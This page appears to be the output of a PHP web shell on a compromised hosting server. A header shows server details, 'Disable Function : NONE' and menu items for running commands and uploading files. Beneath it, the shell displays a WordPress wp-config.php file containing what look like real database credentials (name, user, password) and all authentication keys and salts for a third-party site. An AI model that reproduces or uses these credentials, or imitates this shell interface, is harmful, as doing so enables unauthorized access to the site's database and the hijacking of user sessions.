�
|
Server IP : 46.242.248.7 / Your IP : 216.73.217.130 Web Server : Apache System : Linux sv321.home.net.pl 6.8.2 husak_dirty_pages_fix #1 SMP PREEMPT_DYNAMIC Tue Apr 2 22:06:51 CEST 2024 x86_64 User : ( 3261564) PHP Version : 8.2.29 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : / |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', '38096270_palletizers_eu' );
/** Database username */
define( 'DB_USER', '38096270_palletizers_eu' );
/** Database password */
define( 'DB_PASSWORD', '75LHbrtLH75LHbrtLH' );
/** Database hostname */
define( 'DB_HOST', 'mysql8' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', 'qj5-cQ:Td~Wv@O@kfq,LfM}4_NJ}@T,;e5CG!Z1x2~nf-e`Z9_mn/Jr1*qmgs/b:' );
define( 'SECURE_AUTH_KEY', '/tisvv-$[(?6$`t6h%wbBPhpxu)3W2c5!?Sctj]Kym)O;3ab<`iH{l+N8KG7gX: ' );
define( 'LOGGED_IN_KEY', 'cLe,KA<A1q[0jvM-!SKMp}^<E#8X_/@d$~2v$!&#XlhDyf%^(^(n9&<nY.h2$JT[' );
define( 'NONCE_KEY', '4#VGb!Ll~u)]5wXpl7u0::o3BcQC!dKG?aB&g{IK24L@N|pI_j*,S#Y5AhCeomsu' );
define( 'AUTH_SALT', '?jwZdMiV*kp!,}VtWY.ND;&H29<l/~y8r!N;}YQ}(t&+5b@Lll|pJ6NEYsL,n7)#' );
define( 'SECURE_AUTH_SALT', '>NUi.&ZFC}yA5-h57bIoL$i;LD-A]ud3nq4SMHG-!]_QGsC~vIWQ*~2NZn!/N7{L' );
define( 'LOGGED_IN_SALT', '!KHA4P+a[GibK,{r?QMtpXtpRR>!R`b5WJjyX ~nR7T+n&H6hkDTM*H`9N.%023S' );
define( 'NONCE_SALT', '4;UViB9!JIXl:b6a5PI}/lmXze<mB,3At{o+zfJoc9,5eB/3D/-QC:@h/_<Vq9};' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';